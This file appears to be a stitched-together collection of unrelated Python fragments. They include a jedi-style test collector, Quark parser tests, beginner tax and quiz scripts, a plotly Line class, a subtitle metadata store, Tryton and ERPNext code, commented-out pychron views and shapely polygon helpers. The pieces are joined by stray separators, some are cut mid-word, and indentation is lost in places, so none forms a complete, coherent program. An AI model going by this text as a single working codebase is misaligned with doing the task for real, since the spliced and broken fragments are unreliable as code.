def collect_file_tests(path, lines, lines_to_execute):
    """Parse *lines* of a test file and yield IntegrationTestCase objects.

    A test is declared by a comment ``#? ...`` (completion/definition),
    ``#! ...`` (assignment) or ``#< ...`` (usages); the statement under test
    sits on the line *after* the comment.  A non-empty *lines_to_execute*
    restricts collection to those line numbers or (start, end) ranges.
    """
    def makecase(t):
        return IntegrationTestCase(t, correct, line_nr, column,
                                   start, line, path=path, skip=skip)
    start = None
    correct = None
    test_type = None
    skip = None
    for line_nr, line in enumerate(lines, 1):
        if correct is not None:
            # Previous line held the test comment; this line is the code
            # under test.  An optional leading number sets an explicit column.
            r = re.match('^(\d+)\s*(.*)$', correct)
            if r:
                column = int(r.group(1))
                correct = r.group(2)
                start += r.regs[2][0]  # second group, start index
            else:
                column = len(line) - 1  # -1 for the \n
            if test_type == '!':
                yield makecase(TEST_ASSIGNMENTS)
            elif test_type == '<':
                yield makecase(TEST_USAGES)
            elif correct.startswith('['):
                yield makecase(TEST_COMPLETIONS)
            else:
                yield makecase(TEST_DEFINITIONS)
            correct = None
        else:
            skip = skip or skip_python_version(line)
            try:
                r = re.search(r'(?:^|(?<=\s))#([?!<])\s*([^\n]*)', line)
                # test_type is ? for completion and ! for goto_assignments
                test_type = r.group(1)
                correct = r.group(2)
                # Quick hack to make everything work (not quite a bloody unicorn hack though).
                if correct == '':
                    correct = ' '
                start = r.start()
            except AttributeError:
                # No test comment on this line.
                correct = None
            else:
                # Skip the test, if this is not specified test.
                for l in lines_to_execute:
                    if isinstance(l, tuple) and l[0] <= line_nr <= l[1] \
                            or line_nr == l:
                        break
                else:
                    if lines_to_execute:
                        correct = None
def collect_dir_tests(base_dir, test_files, check_thirdparty=False):
    """Yield test cases from every matching ``*.py`` file in *base_dir*.

    *test_files* maps file-name prefixes to line numbers to execute; when
    empty, every file is collected.  With *check_thirdparty*, tests in
    ``<lib>_.py`` files are skipped when ``<lib>`` cannot be imported.
    """
    for f_name in os.listdir(base_dir):
        files_to_execute = [a for a in test_files.items() if f_name.startswith(a[0])]
        lines_to_execute = reduce(lambda x, y: x + y[1], files_to_execute, [])
        if f_name.endswith(".py") and (not test_files or files_to_execute):
            skip = None
            if check_thirdparty:
                lib = f_name.replace('_.py', '')
                try:
                    # there is always an underline at the end.
                    # It looks like: completion/thirdparty/pylab_.py
                    __import__(lib)
                except ImportError:
                    skip = 'Thirdparty-Library %s not found.' % lib
            path = os.path.join(base_dir, f_name)
            # Read the file as unicode on both Python 2 and 3.
            if is_py3:
                source = open(path, encoding='utf-8').read()
            else:
                source = unicode(open(path).read(), 'UTF-8')
            for case in collect_file_tests(path, StringIO(source),
                                           lines_to_execute):
                case.source = source
                if skip:
|
# Copyright 2015 datawire. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os, pytest
from quarkc.compiler import Compiler
from .util import assert_file, maybe_xfail, is_excluded_file
# Collect every Quark source file (*.q) from the "parse" fixture directory.
directory = os.path.join(os.path.dirname(__file__), "parse")
files = [name for name in os.listdir(directory) if name.endswith(".q")]
paths = [os.path.join(directory, name) for name in files]
@pytest.fixture(params=paths)
def path(request):
    """Parametrized fixture: yields each fixture file path in turn."""
    return request.param
def test_parse(path):
    # Round-trip every fixture file, honoring the shared exclusion filter.
    parse(path, is_excluded_file)
def test_parse_builtin():
    # The empty file exercises parsing of just the implicit builtins.
    parse(os.path.join(directory, "empty-file.q"), lambda x: False)
def parse(path, file_filter):
    """Parse *path*, compare AST/code dumps to golden files, and round-trip.

    For every file the compiler pulls in (minus those rejected by
    *file_filter*), the pretty-printed AST and the regenerated code are
    compared against the checked-in ``.ast``/``.code`` files, and the
    regenerated code is re-parsed to confirm it reproduces itself.
    """
    dir = os.path.dirname(path)
    text = open(path).read()
    maybe_xfail(text)  # honor expected-failure markers in the source text
    c = Compiler()
    c.urlparse(path, recurse=False)
    for ast in c.roots[path].files:
        if file_filter(ast.filename): continue
        base = os.path.splitext(ast.filename)[0]
        assert_file(os.path.join(dir, base + ".ast"), ast.pprint())
        code = ast.code()
        assert_file(os.path.join(dir, base + ".code"), code)
        # Re-parse the generated code: it must regenerate byte-identically.
        rtc = Compiler()
        rtc.urlparse(base + ".code", recurse=False)
        for f in rtc.roots[base + ".code"].files:
            if f.name == base + ".code":
                assert f.code() == code
                break
        else:
            assert False
|
# Simple progressive-tax demo: pick a coefficient from the income bracket.
income = 15000
# Bracket table: (upper bound, coefficient); anything above falls through
# to the top rate.
taxCoefficient = 0.45
for limit, rate in ((10000, 0.0), (30000, 0.2), (100000, 0.35)):
    if income < limit:
        taxCoefficient = rate
        break
print("Need to pay: ", income * taxCoefficient, "in taxes")

# With flag False only "b" and "d" are printed.
flag = False
if flag:
    print("a")
print("b")
if flag:
    print("c")
print("d")

# Orders above 100 earn a flat discount of 25.
orderAmount = 300
if orderAmount > 100:
    discount = 25
else:
    discount = 0
print(discount)
# Teacher Quiz - Python Code - Elizabeth Tweedale
import csv, random
def askName():
    """Greet the player and return the name they type in."""
    print("Welcome to the Super Python Quiz!")
    playerName = input("What is your name? ")
    print("Hello", str(playerName))
    return playerName
def getQuestions():
    """Read the quiz questions from SuperPythonQuiz.csv into a list of rows."""
    with open("SuperPythonQuiz.csv", mode="r", encoding="utf-8") as quizFile:
        return [row for row in csv.reader(quizFile)]
def askQuestion(question, score):
    """Show one question, read the player's answer, return the updated score.

    *question* is a row: [text, choice1, ..., choiceN, correctAnswer].
    """
    print(question[0])
    for choice in question[1:-1]:
        print("{0:>5}{1}".format("", choice))
    reply = input("Please select an answer: ")
    if reply == question[-1]:
        print("Correct!")
        return score + 1
    print("Incorrect, the correct answer was {0}.".format(question[-1]))
    return score
def recordScore(studentName, score):
    """Append "name,score" to QuizResults.txt, creating the file if needed."""
    with open("QuizResults.txt", mode="a+", encoding="utf-8") as resultsFile:
        resultsFile.write("{0},{1}\n".format(studentName, score))
def main():
    """Run the quiz: greet, ask every question once in random order, record."""
    studentName = askName()
    questions = getQuestions()
    score = 0
    total = len(questions)
    for _ in range(total):
        question = random.choice(questions)
        score = askQuestion(question, score)
        questions.remove(question)  # never ask the same question twice
    print("Your final score is:", score, "out of:", total)
    recordScore(studentName, score)
main()
|
o the
colorscale relative to the max and min values of the
array or relative to `marker.line.cmin` and
`marker.line.cmax` if set.
coloraxis
Sets a reference to a shared color axis. References to
these shared color axes are "coloraxis", "coloraxis2",
"coloraxis3", etc. Settings for these shared color axes
are set in the layout, under `layout.coloraxis`,
`layout.coloraxis2`, etc. Note that multiple color
scales can be linked to the same color axis.
colorscale
Sets the colorscale. Has an effect only if in
`marker.line.color`is set to a numerical array. The
colorscale must be an array containing arrays mapping a
normalized value to an rgb, rgba, hex, hsl, hsv, or
named color string. At minimum, a mapping for the
lowest (0) and highest (1) values are required. For
example, `[[0, 'rgb(0,0,255)'], [1, 'rgb(255,0,0)']]`.
To control the bounds of the colorscale in color space,
use`marker.line.cmin` and `marker.line.cmax`.
Alternatively, `colorscale` may be a palette name
string of the following list: Blackbody,Bluered,Blues,C
ividis,Earth,Electric,Greens,Greys,Hot,Jet,Picnic,Portl
and,Rainbow,RdBu,Reds,Viridis,YlGnBu,YlOrRd.
colorsrc
Sets the source reference on Chart Studio Cloud for
`color`.
reversescale
Reverses the color mapping if true. Has an effect only
if in `marker.line.color`is set to a numerical array.
If true, `marker.line.cmin` will correspond to the last
color in the array and `marker.line.cmax` will
correspond to the first color.
width
Sets the width (in px) of the lines bounding the marker
points.
"""
def __init__(
self,
arg=None,
autocolorscale=None,
cauto=None,
cmax=None,
cmid=None,
cmin=None,
color=None,
coloraxis=None,
colorscale=None,
colorsrc=None,
reversescale=None,
width=None,
**kwargs
):
"""
Construct a new Line object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of
:class:`plotly.graph_objs.scatter3d.marker.Line`
autocolorscale
Determines whether the colorscale is a default palette
(`autocolorscale: true`) or the palette determined by
`marker.line.colorscale`. Has an effect only if in
`marker.line.color`is set to a numerical array. In case
`colorscale` is unspecified or `autocolorscale` is
true, the default palette will be chosen according to
whether numbers in the `color` array are all positive,
all negative or mixed.
cauto
Determines whether or not the color domain is computed
with respect to the input data (here in
`marker.line.color`) or the bounds set in
`marker.line.cmin` and `marker.line.cmax` Has an
effect only if in `marker.line.color`is set to a
numerical array. Defaults to `false` when
`marker.line.cmin` and `marker.line.cmax` are set by
the user.
cmax
Sets the upper bound of the color domain. Has an effect
only if in `marker.line.color`is set to a numerical
array. Value should have the same units as in
`marker.line.color` and if set, `marker.line.cmin` must
be set as well.
cmid
Sets the mid-point of the color domain by scaling
`marker.line.cmin` and/or `marker.line.cmax` to be
equidistant to this point. Has an effect only if in
`marker.line.color`is set to a numerical array. Value
should have the same units as in `marker.line.color`.
Has no effect when `marker.line.cauto` is `false`.
cmin
Sets the lower bound of the color domain. Has an effect
only if in `marker.line.color`is set to a numerical
array. Value should have the same units as in
`marker.line.color` and if set, `marker.line.cmax` must
be set as well.
color
Sets themarker.linecolor. It accepts either a specific
color or an array of numbers that are mapped to the
colorscale relative to the max and min values of the
array or relative to `marker.line.cmin` and
`marker.line.cmax` if set.
coloraxis
Sets a reference to a shared color axis. References to
these shared color axes are "coloraxis", "coloraxis2",
"coloraxis3", etc. Settings for these shared color axes
are set in the layout, under `layout.coloraxis`,
`layout.coloraxis2`, etc. Note that multiple color
scales can be linked to the same color axis.
colorscale
Sets the colorscale. Has an effect only if in
`marker.line.color`is set to a numerical array. The
colorscale must be an array containing arrays mapping a
normalized value to an rgb, rgba, hex, hsl, hsv, or
named color string. At minimum, a mapping for the
lowest (0) and highest (1) values are required. For
example, `[[0, 'rgb(0,0,255)'], [1, 'rgb(255,0,0)']]`.
To control the bounds of the colorscale in color space,
use`marker.line.cmin` and `marker.line.cmax`.
Alternatively, `colorscale` may be a palette name
string of the following list: Blackbody,Bluered,Blues,C
ividis,Earth,Electric,Greens,Greys,Hot,Jet,Picnic,Portl
and,Rainbow,RdBu,Reds,Viridis,YlGnBu,YlOrRd.
colorsrc
Sets the source reference on Chart Studio Cloud for
`color`.
reversescale
Reverses the color mapping if true. Has an effect only
if in `marker.line.color`is set to a numerical array.
If true, `marker.line.cmin` will correspond to the last
color in the array and `marker.line.cmax` will
correspond to the first color.
width
Sets the width (in px) of the lines bounding the marker
points.
Returns
-------
Line
"""
super(Line, self).__init__("line")
if "_parent" in kwargs:
self._parent = kwargs["_parent"]
return
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.scatter3d.marker.Line
constructor must be a dict or
an instance of :class:`plotly.graph_objs.scatter3d.marker.Line`"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
self._validate = kwargs.pop("_validate", True)
# Populate data dict with properties
| # ----------------------------------
_v = arg.pop("autocolorscale", None)
_v = autocolorscale if autocolorscale is not None else _v
if _v is not None:
self["autocolorscale"] = _v
_v = arg.pop("cauto", | None)
_v = cauto if cauto is not None else _v
if _v is not None:
self["cauto"] = _v
_v = arg.pop("cmax", None)
_v = cmax if cmax is not None else _v
if _v is not None:
self["cmax"] = _v
_v = arg.pop("cmid", None)
_v = cmid if cmid is not None else _v
if _v is not None:
self["cmid"] = _v
_v = arg.pop("cmin", None)
|
in the db.
@param fk_key: a foreign key from the Metadata table. Notice that
sqlite does not enforce the fk constraint. Be careful!
@param subtitles: a dictionary {lang : SubtitleInfo} (subtitle must be
an instance of SubtitleInfo)
@param commitNow: if False the transaction is not committed
"""
allSubtitles = self._getAllSubtitlesByKey(fk_key)
oldSubsSet = frozenset(allSubtitles.keys())
newSubsSet = frozenset(subtitles.keys())
commonLangs = oldSubsSet & newSubsSet
newLangs = newSubsSet - oldSubsSet
toDelete = oldSubsSet - newSubsSet
#update existing subtitles
for lang in commonLangs:
self._updateSubtitle(fk_key, subtitles[lang], False)
#remove subtitles that are no more in the set
for lang in toDelete:
self._deleteSubtitle(fk_key, lang, False)
#insert new subtitles
for lang in newLangs:
self._insertNewSubtitle(fk_key, subtitles[lang], False)
if commitNow:
self._db.commit()
def _updateSubtitle(self, metadata_fk, subtitle, commitNow=True):
"""
Update an entry in the Subtitles database.
If the entry identified by metadata_fk, subtitle.lang does not exist
in the subtitle database this method does nothing.
@param metadata_fk: foreign key of the metadata table
@param subtitle: instance of Subitle containing the data to insert
@param commitNow: if False, this method does not commit the changes to
the database
"""
assert metadata_fk is not None
assert subtitle is not None
assert isinstance(subtitle, SubtitleInfo)
toUpdate = self._getSubtitleByKey(metadata_fk, subtitle.lang)
if toUpdate is None:
return
query = QUERIES["UPDATE SUBTITLES"]
checksum = bin2str(subtitle.checksum)
self._db.execute_write(query, (subtitle.path,
checksum, metadata_fk, subtitle.lang),
commitNow)
    def updateSubtitlePath(self, channel, infohash, lang, newPath, commitNow=True):
        """
        Updates a subtitle entry in the database if it exists.
        Given the channel, the infohash, and a SubtitleInfo instance,
        the entry relative to that subtitle is updated accordingly
        to the details in the SubtitleInfo instance.
        If an instance for the provided channel, infohash, and language
        does not already exist in the db, nothing is done.
        @param channel: the channel id (permid) of the channel for the
            subtitle (binary)
        @param infohash: the infohash of the item the subtitle refrs to
            (binary)
        @param lang: the language of the subtitle to update
        @param path: the new path of the subtitle. None to indicate that the
            subtitle is not available
        @return True if an entry was updated in the db. False if nothing
            got written on the db
        @precondition: subtitle.lang is not None
        """
        query = QUERIES["SELECT SUBS JOIN HASH ONE"]
        # Keys are stored in the db as their string encoding.
        channel = bin2str(channel)
        infohash = bin2str(infohash)
        res = self._db.fetchall(query, (infohash, channel, lang))
        # (infohash, channel, lang) must identify at most one row.
        if len(res) > 1 :
            raise MetadataDBException("Metadata DB constraint violated")
        elif len(res) == 0 :
            if DEBUG:
                print >> sys.stderr, "Nothing to update for channel %s, infohash %s, lang"\
                    " %s. Doing nothing." % (channel[-10:],\
                    infohash, lang)
            return False
        else:
            query = QUERIES["UPDATE SUBTITLES"]
            self._db.execute_write(query, (newPath,
                                    res[0][3], res[0][0], lang),
                                    commitNow)
            return True
def _deleteSubtitle(self, metadata_fk, lang, commitNow=True):
"""
Delete an entry from the subtitles table.
Given a foreign key from the metadata table and a language delets
the corresponding entry in the subtitle table. If the entry
is not found, it does nothing.
@param metadata_fk: a foreign key from the Metadata table
@param lang: a 3 characters language code
@param commitNow: if False does not commit the transaction
"""
assert metadata_fk is not None
assert lang is not None
query = QUERIES["DELETE ONE SUBTITLES"]
self._db.execute_write(query, (metadata_fk, lang), commitNow)
def _insertNewSubtitle(self, metadata_fk, subtitle, commitNow=True) :
"""
Insert a new subtitle entry in the Subtitles table.
Given a foreign key from the Metadata table, and a SubtitleInfo instance
describing the subtitle to insert, adds it to the metadata table.
This method assumes that that entry does not already exist in the
table.
NOTICE that sqlite does not enforce the foreign key constraint,
so be careful about integrity
"""
assert metadata_fk is not None
assert subtitle is not | None
assert isinstance(subtitle, SubtitleInfo)
query = QUERIES["INSERT SUBTITLES"]
checksum = bin2str(subtitle.checksum)
self._db.execute_write(query, (metadata_fk, subtitle.lang,
subtitle.path, checksum),
commitNow)
    def deleteMetadata(self, channel, infohash):
        """
        Removes all the metadata associated to a channel/infohash.
        Everything is dropped from both the Metadata and Subtitles db.
        @param channel: the permid of the channel's owner
        @param infohash: the infhoash of the entry
        """
        assert channel is not None
        assert infohash is not None
        channel = bin2str(channel)
        infohash = bin2str(infohash)
        query = QUERIES["SELECT METADATA"]
        if DEBUG:
            print >> sys.stderr, "Performing query on db: " + query
        res = self._db.fetchall(query, (infohash, channel))
        if len(res) == 0 :
            return
        if len(res) > 1 :
            # NOTE(review): sibling methods raise MetadataDBException for this
            # same condition; IOError here looks inconsistent -- confirm.
            raise IOError("Metadata DB constraint violated")
        metadata_fk = res[0][0]
        # Drop the subtitles first, then the metadata row, in one commit.
        self._deleteAllSubtitles(metadata_fk, False)
        query = QUERIES["DELETE METADATA PK"]
        self._db.execute_write(query, (metadata_fk,), False)
        self._db.commit()
def _deleteAllSubtitles(self, metadata_fk, commitNow):
query = QUERIES["DELETE ALL SUBTITLES"]
self._db.execute_write(query, (metadata_fk,), commitNow)
def getAllLocalSubtitles(self):
'''
Returns a structure containing all the subtitleInfos that are pointing
to a local path
@return a dictionary like this:
{ ...
channel1 : { infohash1 : [ SubtitleInfo1, ...] }
...
}
'''
query = QUERIES["SELECT SUBTITLES WITH PATH"]
res = self._db.fetchall(query)
result = {}
for entry in res:
# fk = entry[0]
path = entry[1]
lang = entry[2]
checksum = str2bin(entry[3])
channel = str2bin(entry[4])
infohash = str2bin(entry[5])
s = SubtitleInfo(lang, path, checksum)
|
# -*- codin | g: utf-8 -*-
import unittest
import trytond.tests.test_tryton
from test_invoice import TestInvoice
def suite():
    """
    Build the module's test suite on top of the trytond base suite.
    """
    loader = unittest.TestLoader()
    test_suite = trytond.tests.test_tryton.suite()
    test_suite.addTests([loader.loadTestsFromTestCase(TestInvoice)])
    return test_suite
if __name__ == '__main__':
    # Run the suite directly; verbosity=2 prints one line per test.
    unittest.TextTestRunner(verbosity=2).run(suite())
|
t_voucher' : self.name,
'account' : party_account,
'party_type': party_type,
'party': party,
'is_advance' : 'Yes',
'dr_or_cr' : dr_or_cr,
'unadjusted_amount' : flt(d.advance_amount),
'allocated_amount' : flt(d.allocated_amount),
'exchange_rate': (self.conversion_rate
if self.party_account_currency != self.company_currency else 1),
'grand_total': (self.base_grand_total
if self.party_account_currency==self.company_currency else self.grand_total),
'outstanding_amount': self.outstanding_amount
})
lst.append(args)
if lst:
from erpnext.accounts.utils import reconcile_against_document
reconcile_against_document(lst)
	def validate_multiple_billing(self, ref_dt, item_ref_dn, based_on, parentfield):
		"""Block overbilling of reference-document items beyond tolerance.

		For each item linked to *ref_dt* (e.g. a Sales Order), sum what other
		submitted documents have already billed plus this document's amount,
		and throw when the total exceeds the reference amount by more than
		the configured tolerance.
		"""
		from erpnext.controllers.status_updater import get_tolerance_for
		item_tolerance = {}
		global_tolerance = None
		for item in self.get("items"):
			if item.get(item_ref_dn):
				ref_amt = flt(frappe.db.get_value(ref_dt + " Item",
					item.get(item_ref_dn), based_on), self.precision(based_on, item))
				if not ref_amt:
					frappe.msgprint(_("Warning: System will not check overbilling since amount for Item {0} in {1} is zero").format(item.item_code, ref_dt))
				else:
					# Amount billed by *other* submitted documents against the same row.
					already_billed = frappe.db.sql("""select sum(%s) from `tab%s`
						where %s=%s and docstatus=1 and parent != %s""" %
						(based_on, self.doctype + " Item", item_ref_dn, '%s', '%s'),
						(item.get(item_ref_dn), self.name))[0][0]
					total_billed_amt = flt(flt(already_billed) + flt(item.get(based_on)),
						self.precision(based_on, item))
					tolerance, item_tolerance, global_tolerance = get_tolerance_for(item.item_code,
						item_tolerance, global_tolerance)
					max_allowed_amt = flt(ref_amt * (100 + tolerance) / 100)
					# The 0.01 slack avoids spurious throws from float rounding.
					if total_billed_amt - max_allowed_amt > 0.01:
						frappe.throw(_("Cannot overbill for Item {0} in row {1} more than {2}. To allow over-billing, please set in Buying Settings").format(item.item_code, item.idx, max_allowed_amt))
def get_company_default(self, fieldname):
from erpnext.accounts.utils import get_company_default
return get_company_default(self.company, fieldname)
	def get_stock_items(self):
		"""Return the distinct item codes on this document that are stock items."""
		stock_items = []
		item_codes = list(set(item.item_code for item in self.get("items")))
		if item_codes:
			# One query with a placeholder per distinct item code.
			stock_items = [r[0] for r in frappe.db.sql("""select name
				from `tabItem` where name in (%s) and is_stock_item=1""" % \
				(", ".join((["%s"]*len(item_codes))),), item_codes)]
		return stock_items
	def set_total_advance_paid(self):
		"""Recompute and store advance_paid from submitted GL Entries.

		Sums the advances posted against this document (credit side for a
		Sales Order, debit side otherwise), validates the total against the
		grand total, and persists it on the document.
		"""
		if self.doctype == "Sales Order":
			dr_or_cr = "credit_in_account_currency"
			party = self.customer
		else:
			dr_or_cr = "debit_in_account_currency"
			party = self.supplier
		advance = frappe.db.sql("""
			select
				account_currency, sum({dr_or_cr}) as amount
			from
				`tabGL Entry`
			where
				against_voucher_type = %s and against_voucher = %s and party=%s
				and docstatus = 1
		""".format(dr_or_cr=dr_or_cr), (self.doctype, self.name, party), as_dict=1)
		if advance:
			advance = advance[0]
			advance_paid = flt(advance.amount, self.precision("advance_paid"))
			formatted_advance_paid = fmt_money(advance_paid, precision=self.precision("advance_paid"),
				currency=advance.account_currency)
			frappe.db.set_value(self.doctype, self.name, "party_account_currency",
				advance.account_currency)
			# Compare against the grand total expressed in the same currency
			# the advances were posted in.
			if advance.account_currency == self.currency:
				order_total = self.grand_total
				formatted_order_total = fmt_money(order_total, precision=self.precision("grand_total"),
					currency=advance.account_currency)
			else:
				order_total = self.base_grand_total
				formatted_order_total = fmt_money(order_total, precision=self.precision("base_grand_total"),
					currency=advance.account_currency)
			if self.currency == self.company_currency and advance_paid > order_total:
				frappe.throw(_("Total advance ({0}) against Order {1} cannot be greater than the Grand Total ({2})")
					.format(formatted_advance_paid, self.name, formatted_order_total))
			frappe.db.set_value(self.doctype, self.name, "advance_paid", advance_paid)
@property
def company_abbr(self):
if not hasattr(self, "_abbr"):
self._abbr = frappe.db.get_value("Company", self.company, "abbr")
return self._abbr
def validate_party(self):
party_type, party = self.get_party()
validate_party_frozen_disabled(party_type, party)
def get_party(self):
party_type = None
if self.doctype in ("Opportunity", "Quotation", "Sales Order", "Delivery Note", "Sales Invoice"):
party_type = 'Customer'
elif self.doctype in ("Supplier Quotation", "Purchase Order", "Purchase Receipt", "Purchase Invoice"):
party_type = 'Supplier'
elif self.meta.get_field("customer"):
party_type = "Customer"
elif self.meta.get_field("supplier"):
party_type = "Supplier"
party = self.get(party_type.lower()) if party_type else None
return party_type, party
	def validate_currency(self):
		"""Throw when the document currency conflicts with the party account currency."""
		if self.get("currency"):
			party_type, party = self.get_party()
			if party_type and party:
				party_account_currency = get_party_account_currency(party_type, party, self.company)
				# A party whose account is kept in a foreign currency may
				# only be billed in that currency.
				if (party_account_currency
					and party_account_currency != self.company_currency
					and self.currency != party_account_currency):
					frappe.throw(_("Accounting Entry for {0}: {1} can only be made in currency: {2}")
						.format(party_type, party, party_account_currency), InvalidCurrency)
			# Note: not validating with gle account because we don't have the account
			# at quotation / sales order level and we shouldn't stop someone
			# from creating a sales invoice if sales order is already created
def validate_fixed_asset(self):
for d in self.get("items"):
if d.is_fixed_asset:
if d.qty > 1:
frappe.throw(_("Row #{0}: Qty must be 1, as item is a fixed asset. Please use separate row for multiple qty.").format(d.idx))
if d.meta.get_field("asset"):
if not d.asset:
frappe.throw(_("Row #{0}: Asset is mandatory for fixed asset purchase/sale")
.format(d.idx))
else:
asset = frappe.get_doc("Asset", d.asset)
if asset.company != self.company:
frappe.throw(_("Row #{0}: Asset {1} does not belong to company {2}")
.format(d.idx, d.asset, self.company))
elif asset.item_code != d.item_code:
frappe.throw(_("Row #{0}: Asset {1} does not linked to Item {2}")
.format(d.idx, d.asset, d.item_code))
elif asset.docstatus != 1:
frappe.throw(_("Row #{0}: Asset {1} must be submitted").format(d.idx, d.asset))
elif self.doctype == "Purchase Invoice":
if asset.status != "Submitted":
frappe.throw(_("Row #{0}: Asset {1} is already {2}")
.format(d.idx, d.asset, asset.status))
elif getdate(asset.purchase_date) != getdate(self.posting_date):
frappe.throw(_("Row #{0}: Posting Date must be same as purch | ase date {1} of asset {2}").format(d.idx, asset.purchase_date, d.asset | ))
elif asset.is_existing_asset:
frappe.throw(_("Row #{0}: Purchase Invoice cannot be made against an existing asset {1}").format(d.idx, d.asset))
elif self.docstatus=="Sales Invoice" and self.docstatus == 1:
if self.update_stock:
frappe.throw(_("'Update Stock' cannot be checked for fixed asset sale"))
elif asset.status in ("Scrapped", "Cancelled", "Sold"):
frappe.throw(_("Row #{0}: Asset {1} cannot be submitted, it is already {2}")
.format(d.idx, d.asset, asset.status))
	def delink_advance_entries(self, linked_doc_name):
		"""Delete advance rows referencing *linked_doc_name* and refresh total_advance."""
		total_allocated_amount = 0
		for adv in self.advances:
			consider_for_total_advance = True
			if adv.reference_name == linked_doc_name:
				frappe.db.sql("""delete from `tab{0} Advance`
					where name = %s""".format(self.doctype), adv.name)
				consider_for_total_advance = False
			if consider_for_total_advance:
				total_allocated_amount += flt(adv.allocated_amount, adv.precision("allocated_amount"))
		# Persist without touching the modified timestamp.
		frappe.db.set_value(self.doctype, self.name, "total_advance",
			total_allocated_amount, update_modified=False)
def group_similar_items(self):
group_item_qty = {}
group_item_amount = {}
for |
# # ===============================================================================
# # Copyright 2015 Jake Ross
# #
# # Licensed under the Apache License, Version 2.0 (the "License");
# # you may not use this file except in compliance with the License.
# # You may obtain a copy of the License at
# #
# # http://www.apache.org/licenses/LICENSE-2.0
# #
# # Unless required by applicable law or agreed to in writing, software
# # distributed under the License is distributed on an "AS IS" BASIS,
# # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# # See the License for the specific language governing permissions and
# # limitations under the License.
# # ===============================================================================
#
# # ============= enthought library imports =======================
# from __future__ import absolute_import
# from traitsui.api import View, UItem, HGroup, VGroup
# from traitsui.editors.api import EnumEditor
# from traitsui.handler import Controller
# # ============= standard library imports ========================
# # ============= local library imports ==========================
# from pychron.envisage.icon_button_editor import icon_button_editor
#
#
# class NewBranchView(Controller):
# def traits_view(self):
# v = View(UItem('new_branch_name'),
# | title='New Branch Name',
# width=300,
# kind='livemodal',
# buttons=['OK', 'Cancel'])
# return v
#
#
# class ManageBranchView(Controller):
# def traits_view(self):
# v = View(
# VGroup(
# | VGroup(HGroup(UItem('branch', editor=EnumEditor(name='all_branches')),
# # icon_button_editor('build_button', 'bricks',
# # tooltip='Build selected branch and set as current application'),
# icon_button_editor('checkout_branch_button', 'bricks',
# tooltip='Checkout selected branch'),
# icon_button_editor('pull_button', 'arrow_down',
# tooltip='Update Branch'),
# show_border=True,
# label='Current Branch'))),
# # VGroup(UItem('edit_branch', editor=EnumEditor(name='branches')),
# # UItem('delete_button', enabled_when='delete_enabled'),
# # show_border=True)),
# title='Manage Branch View',
# buttons=['OK', 'Cancel'])
# return v
#
# # ============= EOF =============================================
|
from rtree import index
import numpy as np
#from shapely.prepared import prep
import shapely
def polygon2points(p):
    """
    Serialize a polygon as a point string for DS documents.
    :param p: shapely.geometry.Polygon
    returns a string "x1,y1,x2,y2,..." built from the exterior ring coordinates
    """
    fragments = ["%s,%s" % (x, y) for x, y in p.exterior.coords]
    return ",".join(fragments)
def sPoints2tuplePoints(s):
    """
    convert a string (from DSxml) to a list of (x, y) float tuples
    :param s: string = 'x,y x,y...'
    returns a list of (float, float) tuples
    """
    # Bug fix: the original inner loop `for (x,y) in sxy.split(',')` tried to
    # unpack each coordinate *string* as a pair and raised ValueError.
    # Each space-separated token is one "x,y" pair; empty tokens (from double
    # spaces or an empty input string) are skipped.
    return [(float(x), float(y))
            for x, y in (sxy.split(',') for sxy in s.split(' ') if sxy)]
def iuo(z1,z2):
    """
    intersection over union of two polygons
    :param z1: polygon
    :param z2: polygon
    returns z1.intersection(z2).area / z1.union(z2).area
    """
    # Bug fix: shapely's validity flag is `is_valid` (the original `isvalid`
    # would raise AttributeError), and IoU must be computed over the *areas*
    # of the intersection/union geometries, not by dividing the geometries.
    assert z1.is_valid
    assert z2.is_valid
    return z1.intersection(z2).area / z1.union(z2).area
def populateGeo(lZones: list, lElements: list):
    """
    Assign each element of lElements to the zone of lZones it overlaps most
    (argmax of the pairwise overlap area).

    :param lZones: list of geometries with a `bounds` attribute (the zones)
    :param lElements: list of geometries (the elements to place)
    returns a dict mapping zone index -> list of element indices; zones with
        no overlapping element do not appear as keys
    """
    # R-tree over the zones' bounding boxes for fast candidate lookup.
    lIndElements = index.Index()
    dPopulated = {}
    for pos, z in enumerate(lZones):
        # lIndElements.insert(pos, cell.toPolygon().bounds)
        # print (cell,cell.is_valid,cell.bounds)
        lIndElements.insert(pos, z.bounds)
    # aIntersection[j][x] = overlap area between element j and zone x.
    aIntersection = np.zeros((len(lElements),len(lZones)),dtype=float)
    for j,elt in enumerate(lElements):
        # Candidate zones whose bounding box intersects the element's bbox.
        ll = lIndElements.intersection(elt.bounds)
        for x in ll:
            # Overlap left at 0 when shapely cannot compute the intersection.
            try:aIntersection[j][x] = elt.intersection(lZones[x]).area
            except shapely.errors.TopologicalError: pass # operation failed (e.g. invalid geometry); treat overlap as 0
    for i,e in enumerate(lElements):
        # argmax of an all-zero row is 0, so the >0 test below filters out
        # elements that overlap no zone at all.
        best = np.argmax(aIntersection[i])
        # aIntersection == np.zeros : empty
        if aIntersection[i][best]>0:
            try: dPopulated[best].append(i)
            except KeyError:dPopulated[best] = [i]
    return dPopulated
if __name__ == "__main__":
    # Smoke test: 10x10 zones every 10 units, 9x9 elements every 5 units.
    from shapely.geometry import Polygon
    lP = []
    for i in range(0, 100, 10):
        lP.append(Polygon(((i, i), (i, i + 10), (i + 10, i + 10), (i + 10, i))))
    # print (lP[-1])
    lE = []
    for i in range(0, 100, 5):
        lE.append(Polygon(((i, i), (i, i + 9), (i + 9, i + 9), (i + 9, i))))
    # print (lE[-1])
    dres = populateGeo(lP, lE)
    for item in dres:
        # Bug fix: the keys of dres index the *zones* (lP), not the elements;
        # the original printed lE[item], which pointed at the wrong polygon.
        print(lP[item].wkt, [lE[x].wkt for x in dres[item]])
